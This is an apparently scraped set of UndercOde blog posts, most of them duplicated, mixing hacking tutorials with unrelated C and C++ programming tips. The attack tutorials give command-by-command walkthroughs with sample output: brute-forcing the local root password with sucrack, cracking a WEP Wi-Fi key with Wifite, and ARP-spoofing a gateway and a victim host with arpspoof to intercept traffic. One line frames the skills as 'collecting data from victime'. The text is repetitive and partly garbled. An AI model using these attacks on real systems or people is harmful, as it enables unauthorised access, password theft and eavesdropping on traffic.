β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Cracking Password for any local user-kali-parrot :
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Physical access attacks are similar to elevating users' rights.
2) That is, when an ordinary user logs in to the system, the passwords of other local user accounts are cracked.
2) In Linux, an ordinary user can perform certain operations on behalf of other users through the su command, which means that the user can elevate his permissions on Linux / Unix systems.
3) In this case, you can use the SUCrack tool to brute-force the password of the local user account using su to complete subsequent penetration attacks.
4) This section will introduce using SUCrack tool to attack this user.
SUCrack is a multi-threaded tool that allows users to brute force the password of a local user account using su. Several options commonly used by this tool are shown below.:
--help: View SUCrack's help file.
-l: Modify the user who attempts to attack the login.
-s: Sets the interval for displaying statistics. The default time is 3 seconds.
-a: Allows the user to set whether to use ANSI escape codes.
-w: is the number of threads available in SUCrack. Because SUCrack is
multi-threaded, users can specify the number of threads they want to run. It is recommended to use only one, because when each login attempt fails, the connection will be retried after a delay of 3 seconds.
[Example 8-8] Use SUCrack to crack the password of the local user. When using the SUCrack command, you need to specify a password file. Otherwise, you will get a funny prompt message. The execution command is as follows:
$ sucrack /usr/share/wordlists/wordlist.txt
password is: 123456
5) As you can see from the output, the password of the local user root is 123456. Because the su command is used, when no user is specified, the root user is used by default.
6) Therefore, after executing the above command, the password of root user root is cracked.
7) If the user wants to set two threads, display statistics every 6 seconds and want to set to use ANSI escape codes. The execution command is as follows:
$ sucrack -w 2 -s 6 -a /usr/share/wordlists/wordlist.txt
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Cracking Password for any local user-kali-parrot :
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Physical access attacks are similar to elevating users' rights.
2) That is, when an ordinary user logs in to the system, the passwords of other local user accounts are cracked.
2) In Linux, an ordinary user can perform certain operations on behalf of other users through the su command, which means that the user can elevate his permissions on Linux / Unix systems.
3) In this case, you can use the SUCrack tool to brute-force the password of the local user account using su to complete subsequent penetration attacks.
4) This section will introduce using SUCrack tool to attack this user.
SUCrack is a multi-threaded tool that allows users to brute force the password of a local user account using su. Several options commonly used by this tool are shown below.:
--help: View SUCrack's help file.
-l: Modify the user who attempts to attack the login.
-s: Sets the interval for displaying statistics. The default time is 3 seconds.
-a: Allows the user to set whether to use ANSI escape codes.
-w: is the number of threads available in SUCrack. Because SUCrack is
multi-threaded, users can specify the number of threads they want to run. It is recommended to use only one, because when each login attempt fails, the connection will be retried after a delay of 3 seconds.
[Example 8-8] Use SUCrack to crack the password of the local user. When using the SUCrack command, you need to specify a password file. Otherwise, you will get a funny prompt message. The execution command is as follows:
$ sucrack /usr/share/wordlists/wordlist.txt
password is: 123456
5) As you can see from the output, the password of the local user root is 123456. Because the su command is used, when no user is specified, the root user is used by default.
6) Therefore, after executing the above command, the password of root user root is cracked.
7) If the user wants to set two threads, display statistics every 6 seconds and want to set to use ANSI escape codes. The execution command is as follows:
$ sucrack -w 2 -s 6 -a /usr/share/wordlists/wordlist.txt
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Wirless -wifi attack-kali-parrot-debian-ubuntu (aslo root android)
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
Wisdom Snipping Tool Kismet guide by Underc0de
> If you want to perform a wireless network penetration test, you must first scan all valid wireless access points. Just in Kali Linux, Kismet, a wireless network sniffing tool, is provided. Use this tool to measure the surrounding wireless signals and see all available wireless access points. This section will introduce sniffing wireless networks using Kismet tools.
1) Start Kismet tool. The execution command is as follows:
root@kali:~# kismet
2) Terminal extension
> This interface is used to set whether to use the default color of the terminal. Because Kismet's default color is gray, some terminals may not be displayed. Use the default colors here, select Yes, the interface will display
3) The interface prompts that the Kismet tool is running as the root user. At this time, select OK, and the interface will shown
4) The interface prompts whether to start the Kismet service automatically. Select Yes, the interface will shown
5) This interface displays some information for setting up Kismet service. Use the default settings here and select Start, the interface will shown
6) This interface displays package resources that have not been defined. Whether to add them now. Select Yes here, the interface will shown
7) Specify the wireless network card interface and description information on this interface. In Intf, enter the wireless network card interface. If the wireless network card is already in listening mode, you can enter wlan0 or mon0. Other information may not be added. Then click the Add button
8) Select the Close Console Window button on this interface, and the interface will be displayed.
9) The information displayed on this interface is that it is sniffing the signals in the wireless network. When running for a certain period of time, stop modifying. Click the Kismet menu option on this interface and select the Quit command
10) After pressing the Quit command
11) Stop Kismet service
Click Kill on this interface to stop Kismet service and exit terminal mode. At this point, the terminal will display some log information
12) the KISMET IS SHUTTING DOWN section you will see that several log files are closed.
> These log files are stored in the / root / directory by default. In these log files, the time when the log was generated is shown. These times are very helpful when running Kismet many times or days.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Wirless -wifi attack-kali-parrot-debian-ubuntu (aslo root android)
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
Wisdom Snipping Tool Kismet guide by Underc0de
> If you want to perform a wireless network penetration test, you must first scan all valid wireless access points. Just in Kali Linux, Kismet, a wireless network sniffing tool, is provided. Use this tool to measure the surrounding wireless signals and see all available wireless access points. This section will introduce sniffing wireless networks using Kismet tools.
1) Start Kismet tool. The execution command is as follows:
root@kali:~# kismet
2) Terminal extension
> This interface is used to set whether to use the default color of the terminal. Because Kismet's default color is gray, some terminals may not be displayed. Use the default colors here, select Yes, the interface will display
3) The interface prompts that the Kismet tool is running as the root user. At this time, select OK, and the interface will shown
4) The interface prompts whether to start the Kismet service automatically. Select Yes, the interface will shown
5) This interface displays some information for setting up Kismet service. Use the default settings here and select Start, the interface will shown
6) This interface displays package resources that have not been defined. Whether to add them now. Select Yes here, the interface will shown
7) Specify the wireless network card interface and description information on this interface. In Intf, enter the wireless network card interface. If the wireless network card is already in listening mode, you can enter wlan0 or mon0. Other information may not be added. Then click the Add button
8) Select the Close Console Window button on this interface, and the interface will be displayed.
9) The information displayed on this interface is that it is sniffing the signals in the wireless network. When running for a certain period of time, stop modifying. Click the Kismet menu option on this interface and select the Quit command
10) After pressing the Quit command
11) Stop Kismet service
Click Kill on this interface to stop Kismet service and exit terminal mode. At this point, the terminal will display some log information
12) the KISMET IS SHUTTING DOWN section you will see that several log files are closed.
> These log files are stored in the / root / directory by default. In these log files, the time when the log was generated is shown. These times are very helpful when running Kismet many times or days.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How analyse packages by kismet ?
instagram.com/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
analyze the data captured above:
1) Change to the / root / directory and use the ls command to view the log file generated above. The execution command is as follows:
2) root@kali:~# ls Kismet-20140723-17-19-48-1.*
Kismet-20140723-17-19-48-1.alert Kismet-20140723-17-19-48-1.netxml
Kismet-20140723-17-19-48-1.gpsxml Kismet-20140723-17-19-48-1.pcapdump
Kismet-20140723-17-19-48-1.nettxt
3) From the output, you can see that there are five log files with different suffix names. All information generated by the Kismet tool is stored in these files. The following describes the formats of these files.
alert: This file includes all warning messages.
4) gpsxml: If a GPS source is used, the relevant GPS data is saved in this file.
5) nettxt: Includes all collected text output information.
6) netxml: Includes all data in XML format.
7) pcapdump: Includes packets captured throughout the session.
The following mainly introduces the tools of PCAP and Text files.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How analyse packages by kismet ?
instagram.com/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
analyze the data captured above:
1) Change to the / root / directory and use the ls command to view the log file generated above. The execution command is as follows:
2) root@kali:~# ls Kismet-20140723-17-19-48-1.*
Kismet-20140723-17-19-48-1.alert Kismet-20140723-17-19-48-1.netxml
Kismet-20140723-17-19-48-1.gpsxml Kismet-20140723-17-19-48-1.pcapdump
Kismet-20140723-17-19-48-1.nettxt
3) From the output, you can see that there are five log files with different suffix names. All information generated by the Kismet tool is stored in these files. The following describes the formats of these files.
alert: This file includes all warning messages.
4) gpsxml: If a GPS source is used, the relevant GPS data is saved in this file.
5) nettxt: Includes all collected text output information.
6) netxml: Includes all data in XML format.
7) pcapdump: Includes packets captured throughout the session.
The following mainly introduces the tools of PCAP and Text files.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Analyze the PCAP signal frame using Wireshark-root android require external wifi adapter >
π¦ ππΌππ πππΈβπ :
1) Start Wireshark. The execution command is as follows:
root@kali:~# wireshark &
2) Open the pcapdump file. Select the File | Open command in the menu bar of the Wireshark interface
Selecting the captured pcapdump file
3) Select the pcapdump file captured by the Kismet tool on this interface, and then click the "Open" button
> pcapdump file data packet1
4) From this interface, you can see all wireless network data packets scanned by Kismet. The Beacon package is a basic management package for wireless devices and is used to signal other services.
π¦ Analyze Kismet's Text File
1) In Linux, you can use various text editors to open the nettxt file, or use the cat command to view the file contents. Open the nettxt file using Linux's default text editor
2) nettxt file content
> From this interface, you can see that there is a lot of information in the nettxt file, which lists each wireless network scanned.
> >Each wireless network has a label and lists each client connected to these wireless networks
3) Client Information
From this interface, you can see a Client1 whose MAC address is 00: c1: 40: 76: 05: 6c. It indicates that a client with a MAC address of 00: c1: 40: 76: 05: 6c is connected to a wireless access point- examp[le
Well done !
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Analyze the PCAP signal frame using Wireshark-root android require external wifi adapter >
π¦ ππΌππ πππΈβπ :
1) Start Wireshark. The execution command is as follows:
root@kali:~# wireshark &
2) Open the pcapdump file. Select the File | Open command in the menu bar of the Wireshark interface
Selecting the captured pcapdump file
3) Select the pcapdump file captured by the Kismet tool on this interface, and then click the "Open" button
> pcapdump file data packet1
4) From this interface, you can see all wireless network data packets scanned by Kismet. The Beacon package is a basic management package for wireless devices and is used to signal other services.
π¦ Analyze Kismet's Text File
1) In Linux, you can use various text editors to open the nettxt file, or use the cat command to view the file contents. Open the nettxt file using Linux's default text editor
2) nettxt file content
> From this interface, you can see that there is a lot of information in the nettxt file, which lists each wireless network scanned.
> >Each wireless network has a label and lists each client connected to these wireless networks
3) Client Information
From this interface, you can see a Client1 whose MAC address is 00: c1: 40: 76: 05: 6c. It indicates that a client with a MAC address of 00: c1: 40: 76: 05: 6c is connected to a wireless access point- examp[le
Well done !
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Using Wifite to Crack Wireless Networks-kali-parrot-debian-ubuntu-wifislax
<> Some programs for cracking wireless networks use the Aircrack-ng toolset and add a graphical interface or use a text menu to crack the wireless network. This makes it easier for users to use them without having to remember any commands. In this section, we will use the command line tool Wifite to scan and attack wireless networks.
1) Start wifite. The execution command is as follows:
302-01
2) Stop scanning the wireless network, and the following message will be displayed:
> 302-02
From the above information, you can see that 13 wireless access points were scanned as example
3) Select the target of the attack. select the any wireless access point, which is encrypted using WEP. Therefore, it should be relatively easy to attack, as shown below:
[+] select target numbers (1-13) separated by commas, or 'all': 2
[+] 1 target selected.
[0:10:00] preparing attack "Test" (14:E6:E4:AC:FB:20)
[0:10:00] attempting fake authentication (5/5)β¦ failed
[0:10:00] attacking "Test" via arp-replay attack
[0:09:06] started cracking (over 10000 ivs)
[0:09:00] captured 12492 ivs @ 418 iv/sec
[0:09:00] cracked Test (14:E6:E4:AC:FB:20)! key: "6162636465"
[+] 1 attack completed:
[+] 1/1 WEP attacks succeeded
cracked Test (14:E6:E4:AC:FB:20), key: "6162636465"
[+] disabling monitor mode on mon0β¦ done
[+] quitting
π¦ From the output information above, you can see that the attack was successful. Among them, the password of the Test wireless access point is 6162636465.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Using Wifite to Crack Wireless Networks-kali-parrot-debian-ubuntu-wifislax
<> Some programs for cracking wireless networks use the Aircrack-ng toolset and add a graphical interface or use a text menu to crack the wireless network. This makes it easier for users to use them without having to remember any commands. In this section, we will use the command line tool Wifite to scan and attack wireless networks.
1) Start wifite. The execution command is as follows:
302-01
2) Stop scanning the wireless network, and the following message will be displayed:
> 302-02
From the above information, you can see that 13 wireless access points were scanned as example
3) Select the target of the attack. select the any wireless access point, which is encrypted using WEP. Therefore, it should be relatively easy to attack, as shown below:
[+] select target numbers (1-13) separated by commas, or 'all': 2
[+] 1 target selected.
[0:10:00] preparing attack "Test" (14:E6:E4:AC:FB:20)
[0:10:00] attempting fake authentication (5/5)β¦ failed
[0:10:00] attacking "Test" via arp-replay attack
[0:09:06] started cracking (over 10000 ivs)
[0:09:00] captured 12492 ivs @ 418 iv/sec
[0:09:00] cracked Test (14:E6:E4:AC:FB:20)! key: "6162636465"
[+] 1 attack completed:
[+] 1/1 WEP attacks succeeded
cracked Test (14:E6:E4:AC:FB:20), key: "6162636465"
[+] disabling monitor mode on mon0β¦ done
[+] quitting
π¦ From the output information above, you can see that the attack was successful. Among them, the password of the Test wireless access point is 6162636465.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Attack router-full
The various tools introduced earlier are connected to the wireless network by directly cracking the password.
> Because of all the devices in a wireless network environment, the router is one of the most important devices. In order to protect the security of the router, users usually set a more complex password.
> Even some users may use the router's default username and password. However, there are some loopholes in the router itself. It may not be easy for users to get started with complex passwords.
> At this time, you can use the loopholes in the router itself to carry out attacks. This section will introduce the router attack using Routerpwn tool.
> Routerpwn is probably the easiest tool to use. It is used to look for loopholes in the router. Routerpwn is not included in Kali, it is just a website. Its official website address is http://routerpwn.com/
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
>.Arpspoof tool
1) Arpspoof is a very good source code program for ARP spoofing. Its operation will not affect the communication of the entire network, the tool achieves deception by replacing the data in transmission. This section will introduce the use of Arpspoof tool.
2) URL Traffic Manipulation Attack
URL traffic operations are very similar to man-in-the-middle attacks, injecting routed traffic into the Internet through the target host. This process will attack through ARP injection.
3) This section will introduce the use of Arpspoof tools to implement URL traffic manipulation attacks. Use the Arpspoof tool to implement URL traffic manipulation attacks. The specific steps are as follows:
a) Turn on routing and forwarding. The execution command is as follows:
root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
After executing the above command, no information is output.
b) Start Arpspoof injection to attack the target system. The attack method is that the attacker (192.168.6.102) sends ARP packets to spoof the gateway (192.168.6.1) and the target system (192.168.6.101). The following first deceives the target system, and the execution command is as follows:
root@kali:~# arpspoof -i eth0 -t 192.168.6.101 192.168.6.1
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
c) The output shows a packet sent by the attacker to the target host 192.168.6.102. 50: e5: 49: eb: 46: 8d represents the attacker's MAC address; 19: 21: 3f: c3: e5 represents the MAC address of 192.168.6.101. When the above process is successful, when the target host 192.168.6.101 sends data to the gateway 192.168.6.1, it will send it to the attacker 192.168.6.102.
d) Use Arpspoof to attack the gateway. The execution command is as f follows:
root@kali:~# arpspoof -i eth0 -t 192.168.6.1 192.168.6.101
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
e) The ] output shows the packets sent by the attacker to the gateway 192.168.6.
π¦ Attack router-full
The various tools introduced earlier are connected to the wireless network by directly cracking the password.
> Because of all the devices in a wireless network environment, the router is one of the most important devices. In order to protect the security of the router, users usually set a more complex password.
> Even some users may use the router's default username and password. However, there are some loopholes in the router itself. It may not be easy for users to get started with complex passwords.
> At this time, you can use the loopholes in the router itself to carry out attacks. This section will introduce the router attack using Routerpwn tool.
> Routerpwn is probably the easiest tool to use. It is used to look for loopholes in the router. Routerpwn is not included in Kali, it is just a website. Its official website address is http://routerpwn.com/
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
>.Arpspoof tool
1) Arpspoof is a very good source code program for ARP spoofing. Its operation will not affect the communication of the entire network, the tool achieves deception by replacing the data in transmission. This section will introduce the use of Arpspoof tool.
2) URL Traffic Manipulation Attack
URL traffic operations are very similar to man-in-the-middle attacks, injecting routed traffic into the Internet through the target host. This process will attack through ARP injection.
3) This section will introduce the use of Arpspoof tools to implement URL traffic manipulation attacks. Use the Arpspoof tool to implement URL traffic manipulation attacks. The specific steps are as follows:
a) Turn on routing and forwarding. The execution command is as follows:
root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
After executing the above command, no information is output.
b) Start Arpspoof injection to attack the target system. The attack method is that the attacker (192.168.6.102) sends ARP packets to spoof the gateway (192.168.6.1) and the target system (192.168.6.101). The following first deceives the target system, and the execution command is as follows:
root@kali:~# arpspoof -i eth0 -t 192.168.6.101 192.168.6.1
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
c) The output shows a packet sent by the attacker to the target host 192.168.6.102. 50: e5: 49: eb: 46: 8d represents the attacker's MAC address; 19: 21: 3f: c3: e5 represents the MAC address of 192.168.6.101. When the above process is successful, when the target host 192.168.6.101 sends data to the gateway 192.168.6.1, it will send it to the attacker 192.168.6.102.
d) Use Arpspoof to attack the gateway. The execution command is as f follows:
root@kali:~# arpspoof -i eth0 -t 192.168.6.1 192.168.6.101
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
e) The ] output shows the packets sent by the attacker to the gateway 192.168.6.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How Verify the attack of Arpspoof tool by using Wireshark packet capture.
The specific operation steps are shown below.
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Start the Wireshark tool. On the Kali Linux desktop, select "Applications" | Kali Linux | Top 10 Security Tools | wireshark in order. The interface will be displayed.
2) Wireshark startup interface
Under the interface Start, select the interface to be captured. Select eth0 here, and then click the Start button
3) This interface can set related Wireshark settings and start, stop and refresh data packets.
4)) Ping the gateway 192.168.6.1 on the target system 192.168.6.101. The execution command is as follows:
C:\Users\Administrator>ping 192.168.6.1
5) Captured packets
> This interface shows the data transmission process between 192.168.6.101 and 192.168.6.1.
> The number of the entire transmission process is 28-33, 28-30 is a request packet process, and 31-33 is a target response packet process. The captured packets are analyzed in detail below:
28: indicates that 192.168.6.101 (source) sends a ping request to 192.168.6.1 (destination).
29: indicates that 192.168.6.102 forwards the data packet of 192.168.6.101.
30: indicates that 192.168.6.102 will forward the data packet and then send a request to 192.168.6.1.
31: The target host 192.168.6.1 responds to the request of 192.168.6.101.
32: indicates that the response was sent to 192.168.6.102, and the host
33: The destination host 192.168.6.1 sends the forwarded data to 192.168.6.101.
E N J O Y BY U N D E R C OD E
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How Verify the attack of Arpspoof tool by using Wireshark packet capture.
The specific operation steps are shown below.
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Start the Wireshark tool. On the Kali Linux desktop, select "Applications" | Kali Linux | Top 10 Security Tools | wireshark in order. The interface will be displayed.
2) Wireshark startup interface
Under the interface Start, select the interface to be captured. Select eth0 here, and then click the Start button
3) This interface can set related Wireshark settings and start, stop and refresh data packets.
4)) Ping the gateway 192.168.6.1 on the target system 192.168.6.101. The execution command is as follows:
C:\Users\Administrator>ping 192.168.6.1
5) Captured packets
> This interface shows the data transmission process between 192.168.6.101 and 192.168.6.1.
> The number of the entire transmission process is 28-33, 28-30 is a request packet process, and 31-33 is a target response packet process. The captured packets are analyzed in detail below:
28: indicates that 192.168.6.101 (source) sends a ping request to 192.168.6.1 (destination).
29: indicates that 192.168.6.102 forwards the data packet of 192.168.6.101.
30: indicates that 192.168.6.102 will forward the data packet and then send a request to 192.168.6.1.
31: The target host 192.168.6.1 responds to the request of 192.168.6.101.
32: indicates that the response was sent to 192.168.6.102, and the host
33: The destination host 192.168.6.1 sends the forwarded data to 192.168.6.101.
E N J O Y BY U N D E R C OD E
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦now you are able to attack and anylse wireshark-kismet packets- and spoofing- collecting data from victime
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Programming Techniques-Auto Jump
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
<!-
Make the page /index.html automatically jump to /its/index.html immediately after loading Page, the content of /index.html is as follows:
<html>
<head>
<meta http-equiv = "Content-Type" content = "text / html; charset = gb2312">
<meta http-equiv = "refresh" content = " 0, url = / its ">
</ head>
<body bgcolor =" # FFFFFF "text =" # 000000 ">
<a href="http://192.168.18.235/its"> Loading ... </a>
</ body>
</ html>
->
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Programming Techniques-Auto Jump
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
<!-
Make the page /index.html automatically jump to /its/index.html immediately after loading Page, the content of /index.html is as follows:
<html>
<head>
<meta http-equiv = "Content-Type" content = "text / html; charset = gb2312">
<meta http-equiv = "refresh" content = " 0, url = / its ">
</ head>
<body bgcolor =" # FFFFFF "text =" # 000000 ">
<a href="http://192.168.18.235/its"> Loading ... </a>
</ body>
</ html>
->
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Programming Techniques-Cross-platform Code Debugging by Underc0de :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) In development, for code reuse, we always separate the core algorithm from the interface part, the
core algorithm It is generally written in C, and I hope that the code can be compiled and run on other platforms.
2) There is VC on Microsoft platform, and gcc on Unix and some embedded platforms (palm ...). If the code is written and then
ported, it will be uncomfortable enough. It is best to support it when writing code. If you work in the company, you can have more
machines, one with 2000, one with linux, the code has to be copied, or the server using Telnet.
3) If there is only one computer, it will be miserable. Install two operating systems. , Restart, switch operating system.
π¦ Here is a software that can solve this problem. The same source code under Windows is
compiled and debugged with VC and gcc at the same time. It is cygwin. I use vc, gcc.
1) Install cygwin.
First install cygwin. Cygwin is a cygnus.com product. Download it from its website and
install it directly on the Internet. Do nβt forget to select the gcc option during installation.
2) Code directory
My code directory is ZCore. The following are subdirectories. There are two subdirectories in the subdirectory Build:
VC and gcc hold the VC project files and gcc Makefile respectively; the subdirectory Src is the code directory; the
subdirectory Doc In the code is the Readme and other instructions (not used to Chinese comments in English code), the code
To be compiled into a static library. Needless to say the VC compilation environment, let's see how to set up a gcc compilation environment.
Makefile has to be written by myself, there is no Makefile auxiliary tool in my cygwin. Run cygwin.
3) Mapping the directory
We first mount the win32 directory into the posix directory, and run mount to view the original
mounted path. The path of my ZCore is: d: studyzcore, I want to map into / zcore, the
command is: "mount d: / study / zcore / zcore". There is a warning, but no problem. Now
using mount to view, there is one more. This information is stored in the registry
[HKEY_CURRENT_USERSoftwareCygnus SolutionsCygwinmounts v2 / zcore]
If you want to uninstall, use the command "umount / zcore".
4) , gcc compile
with "cd / zcore / build / gcc" into the compilation directory, make it.
In this way, you can use VC to compile with gcc when debugging code, and it will be easier to migrate to other environments in the future.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Programming Techniques-Cross-platform Code Debugging by Underc0de :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) In development, for code reuse, we always separate the core algorithm from the interface part, the
core algorithm It is generally written in C, and I hope that the code can be compiled and run on other platforms.
2) There is VC on Microsoft platform, and gcc on Unix and some embedded platforms (palm ...). If the code is written and then
ported, it will be uncomfortable enough. It is best to support it when writing code. If you work in the company, you can have more
machines, one with 2000, one with linux, the code has to be copied, or the server using Telnet.
3) If there is only one computer, it will be miserable. Install two operating systems. , Restart, switch operating system.
π¦ Here is a software that can solve this problem. The same source code under Windows is
compiled and debugged with VC and gcc at the same time. It is cygwin. I use vc, gcc.
1) Install cygwin.
First install cygwin. Cygwin is a cygnus.com product. Download it from its website and
install it directly on the Internet. Do nβt forget to select the gcc option during installation.
2) Code directory
My code directory is ZCore. The following are subdirectories. There are two subdirectories in the subdirectory Build:
VC and gcc hold the VC project files and gcc Makefile respectively; the subdirectory Src is the code directory; the
subdirectory Doc In the code is the Readme and other instructions (not used to Chinese comments in English code), the code
To be compiled into a static library. Needless to say the VC compilation environment, let's see how to set up a gcc compilation environment.
Makefile has to be written by myself, there is no Makefile auxiliary tool in my cygwin. Run cygwin.
3) Mapping the directory
We first mount the win32 directory into the posix directory, and run mount to view the original
mounted path. The path of my ZCore is: d: studyzcore, I want to map into / zcore, the
command is: "mount d: / study / zcore / zcore". There is a warning, but no problem. Now
using mount to view, there is one more. This information is stored in the registry
[HKEY_CURRENT_USERSoftwareCygnus SolutionsCygwinmounts v2 / zcore]
If you want to uninstall, use the command "umount / zcore".
4) , gcc compile
with "cd / zcore / build / gcc" into the compilation directory, make it.
In this way, you can use VC to compile with gcc when debugging code, and it will be easier to migrate to other environments in the future.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Programming Techniques-Defining Function Objects full by UndercOde :
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
Although function pointers are widely used to implement function callbacks, C ++ also provides an important implementation of callback functions Method, that's the function object. Function objects (also called "operators") are ordinary class objects that override the "()" operator. So syntactically, function objects behave similarly to ordinary functions.
π¦ There are several advantages to using function objects instead of function pointers.
1) First, because objects can be modified internally without changing external interfaces, the design is more flexible and flexible.
2) Function objects also have data members that store the results of previous calls. When using ordinary functions, the results of previous calls need to be stored in global or local static variables, but global or local static variables have certain defects that we do not want to see.
Second, the compiler can implement inline calls in function objects, which further enhances performance.
3) This is almost impossible to achieve in function pointers.
The following example illustrates how to define and use function objects. First, declare a normal class and overload the "()" operator:
class Negate
{
public:
int operator () (int n) {return -n;}
}; In the
4) overloaded operation statement, remember the first circle Brackets are always empty because they represent overloaded operator names; the second parenthesis is a parameter list. Generally, when overloading an operator, the number of parameters is fixed, but when overloading the "()" operator, it is different. It can have any number of parameters.
Because the built-in operation in Negate is unary (only one operand), the overloaded "()" operator also has only one parameter. The return type is the same as the parameter type-in ββthis case, int. The function returns an integer with the opposite sign as the argument.
π¦ Using Function Objects
We now define a function called Callback () to test the function object. Callback () takes two parameters: one for int and one for a reference to the class Negate. Callback () treats the function object neg as a normal function name:
#include <iostream>
using std :: cout;
void Callback (int n, Negate & neg)
{
int val = neg (n); // Call the overloaded Operator "()"
cout << val;
} In
unnecessary code, note that neg is an object, not a function. The compiler translates the statement
int val = neg (n);
into
int val = neg.operator () (n);
